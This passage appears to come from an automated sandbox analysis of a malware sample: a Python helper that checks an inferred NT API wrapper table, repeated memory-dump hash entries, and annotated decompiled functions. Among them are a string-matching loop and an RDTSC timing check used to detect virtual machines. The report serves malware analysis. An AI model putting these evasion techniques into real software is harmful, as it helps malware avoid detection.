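    or code pointers than real parameters. Hex arguments are taken as printed;
    non-hex ones are tried as pointer strings such as "rMA"."""
    found: List[int] = []
    for a in call.args:
        try:
            value = int(a, 16)
        except ValueError:
            decoded = decode_pointer_string(a)
            if decoded is None:
                continue
            value = decoded
        if lo <= value < hi:
            found.append(value)
    return found


# (wrapper, resolved Nt function, slot offset, index) as read from the four
# decompiled wrappers in this report.
WRAPPERS = (
    ("E0041A360", "NtCreateFile",            0xC40, 0x28),
    ("E0041A410", "NtReadFile",              0xC48, 0x2A),
    ("E0041A490", "NtClose",                 0xC50, 0x2C),
    ("E0041A540", "NtAllocateVirtualMemory", 0xC60, 0x30),
)

TABLE_BASE = 0xBA0  # inferred: every row above satisfies slot == TABLE_BASE + 4 * index


def slot_for_index(index: int) -> int:
    """Slot offset implied by the inferred linear layout (an assumption, see TABLE_BASE)."""
    return TABLE_BASE + 4 * index


def table_layout_consistent(rows=WRAPPERS) -> bool:
    """True if every wrapper row agrees with slot == 0xBA0 + 4 * index."""
    return all(slot_for_index(index) == slot for _, _, slot, index in rows)
```

Running table_layout_consistent() over the four wrappers returns True, and slot_for_index(0x29) gives 0xC44, the slot that the misaligned E0041A35A listing shows in its if branch; that is consistent with, but not proof of, one contiguous pointer table indexed by the constant passed to E0041AF60.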

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00409AB0(intOrPtr* _a4) {
                                                				intOrPtr _v8;
                                                				char _v24;
                                                				char _v284;   // 0x104 bytes = MAX_PATH: holds the current entry's name/path string
                                                				char _v804;
                                                				char _v840;
                                                				void* _t24;
                                                				void* _t31;
                                                				void* _t33;
                                                				void* _t34;
                                                				void* _t39;   // match flag: 0 = no match, 1 = one of the compared strings matched
                                                				void* _t50;
                                                				intOrPtr* _t52;
                                                				void* _t53;
                                                				void* _t54;
                                                				void* _t55;
                                                				void* _t56;
                                                				intOrPtr* _t9;    // pointer temporaries used below
                                                				intOrPtr* _t20;
                                                
                                                				_t52 = _a4;
                                                				_t39 = 0; // executed
                                                				// Begin/next/end pattern (inferred from the call structure): E00407EA0 opens an
                                                				// enumeration on the context _t52, E004080E0 advances it, E00408160 closes it.
                                                				_t24 = E00407EA0(_t52,  &_v24); // executed
                                                				_t54 = _t53 + 8;
                                                				if(_t24 != 0) {
                                                					E004080B0( &_v24,  &_v840);
                                                					_t55 = _t54 + 8;
                                                					do {
                                                						// Clear the 0x104-byte name buffer and fill it from the current entry.
                                                						E0041BE10( &_v284, 0x104);
                                                						E0041C480( &_v284,  &_v804);
                                                						_t56 = _t55 + 0x10;
                                                						_t50 = 0x4f;
                                                						// Compare the entry name against 20 strings (indices 0x4f..0x62) fetched
                                                						// through E00414D90; E00414DF0 returning non-zero means a match.
                                                						while(1) {
                                                							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
                                                							_t56 = _t56 + 0x10;
                                                							if(_t31 != 0) {
                                                								break;
                                                							}
                                                							_t50 = _t50 + 1;
                                                							if(_t50 <= 0x62) {
                                                								continue;
                                                							} else {
                                                							}
                                                							goto L8;
                                                						}
                                                						// Match found: mutate the state word at +0x474 and raise the flag,
                                                						// which terminates the enumeration loop below.
                                                						_t9 = _t52 + 0x14; // 0xffffe045
                                                						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                						_t39 = 1;
                                                						L8:
                                                						_t33 = E004080E0( &_v24,  &_v840);
                                                						_t55 = _t56 + 8;
                                                					} while (_t33 != 0 && _t39 == 0);
                                                					_t34 = E00408160(_t52,  &_v24); // executed
                                                					if(_t39 == 0) {
                                                						// Two back-to-back RDTSC reads: the timing-based virtualization check
                                                						// reported in the signature list ("RDTSC time measurements").
                                                						asm("rdtsc");
                                                						asm("rdtsc");
                                                						_v8 = _t34 - 0 + _t34;
                                                						// 0xffffffba is -70 as a 32-bit signed value: the counter at +0x55c is decremented by 70.
                                                						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                					}
                                                					// Fold the match flag into the bytes at +0x31 and +0x32.
                                                					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                					_t20 = _t52 + 0x31; // 0x5608758b
                                                					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                					return 1;
                                                				} else {
                                                					return _t24; // _t24 == 0 here: the enumeration could not be started
                                                				}
                                                			}

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: 6EA
                                                • API String ID: 1279760036-1400015478
                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 27%
                                                			E0041A5F7(void* __eax, void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, char _a12, long _a16, long _a20) {
                                                				void* _t19;
                                                				void* _t33;
                                                				void* _t34;
                                                				intOrPtr* _t36;
                                                				void* _t38;
                                                
                                                				if(__ecx >  *__edx) {
                                                					 *((intOrPtr*)(__ecx - 0x73)) =  *((intOrPtr*)(__ecx - 0x73)) + __edx;
                                                					 *((intOrPtr*)(_t34 + 0x50)) =  *((intOrPtr*)(_t34 + 0x50)) + __edx;
                                                					E0041AF60(_t33);
                                                					_t12 =  &_a12; // 0x414536
                                                					_t19 = RtlAllocateHeap( *_t12, _a16, _a20); // executed
                                                					return _t19;
                                                				} else {
                                                					_t21 = _a4;
                                                					_t3 = _t21 + 0xc6c; // 0xc6e
                                                					_t36 = _t3;
                                                					E0041AF60(_t33, _a4, _t36,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x33);
                                                					return  *((intOrPtr*)( *_t36))(_a8, _a12, _t34, _t38);
                                                				}
                                                			}
                                                0x0041a5f9
                                                0x0041a63d
                                                0x0041a644
                                                0x0041a647
                                                0x0041a652
                                                0x0041a65d
                                                0x0041a661
                                                0x0041a5fb
                                                0x0041a603
                                                0x0041a60f
                                                0x0041a60f
                                                0x0041a617
                                                0x0041a62d
                                                0x0041a62d

                                                APIs
                                                • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: 6EA
                                                • API String ID: 1279760036-1400015478
                                                • Opcode ID: d7731d8716a9909aaebbcc61393e2c5dcb5147951310e5446d50a0b4bd4e0840
                                                • Instruction ID: f8b0307e263f0a20d44079788cd30cb9ea9ec63190e6cfd16d2e7c5213453682
                                                • Opcode Fuzzy Hash: d7731d8716a9909aaebbcc61393e2c5dcb5147951310e5446d50a0b4bd4e0840
                                                • Instruction Fuzzy Hash: 63E026F51082C45FD710DF34A8804C77BA4AE85308768818DF88803603C120C81286A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                                                				char _v67;
                                                				char _v68;
                                                				void* _t12;
                                                				intOrPtr* _t13;
                                                				int _t14;
                                                				long _t21;
                                                				intOrPtr* _t25;
                                                				void* _t26;
                                                				void* _t30;
                                                
                                                				_t30 = __eflags;
                                                				_v68 = 0;
                                                				E0041BE60( &_v67, 0, 0x3f);
                                                				E0041CA00( &_v68, 3);
                                                				_t12 = E0040ACF0(_t30, _a4 + 0x1c,  &_v68); // executed
                                                				_t13 = E00414E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                				_t25 = _t13;
                                                				if(_t25 != 0) {
                                                					_t21 = _a8;
                                                					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                					_t32 = _t14;
                                                					if(_t14 == 0) {
                                                						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                					}
                                                					return _t14;
                                                				}
                                                				return _t13;
                                                			}
                                                0x00408310
                                                0x0040831f
                                                0x00408323
                                                0x0040832e
                                                0x0040833e
                                                0x0040834e
                                                0x00408353
                                                0x0040835a
                                                0x0040835d
                                                0x0040836a
                                                0x0040836c
                                                0x0040836e
                                                0x0040838b
                                                0x0040838b
                                                0x00000000
                                                0x0040838d
                                                0x00408392

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 2d1f258feb65caa57005a4ca8181d3a83820067681332b4e8454df4711668a76
                                                • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                • Opcode Fuzzy Hash: 2d1f258feb65caa57005a4ca8181d3a83820067681332b4e8454df4711668a76
                                                • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			E0040ACE5(void* __eax, void* __ebx, void* __ecx, void* _a8) {
                                                				void* _v4;
                                                				void* _v8;
                                                				void* _v12;
                                                				void* _v536;
                                                				void* _t15;
                                                
                                                				_t15 = __eax;
                                                				asm("stc");
                                                				if (__ebx + 1 <= 0) goto L7;
                                                			}
                                                0x0040ace5
                                                0x0040acee
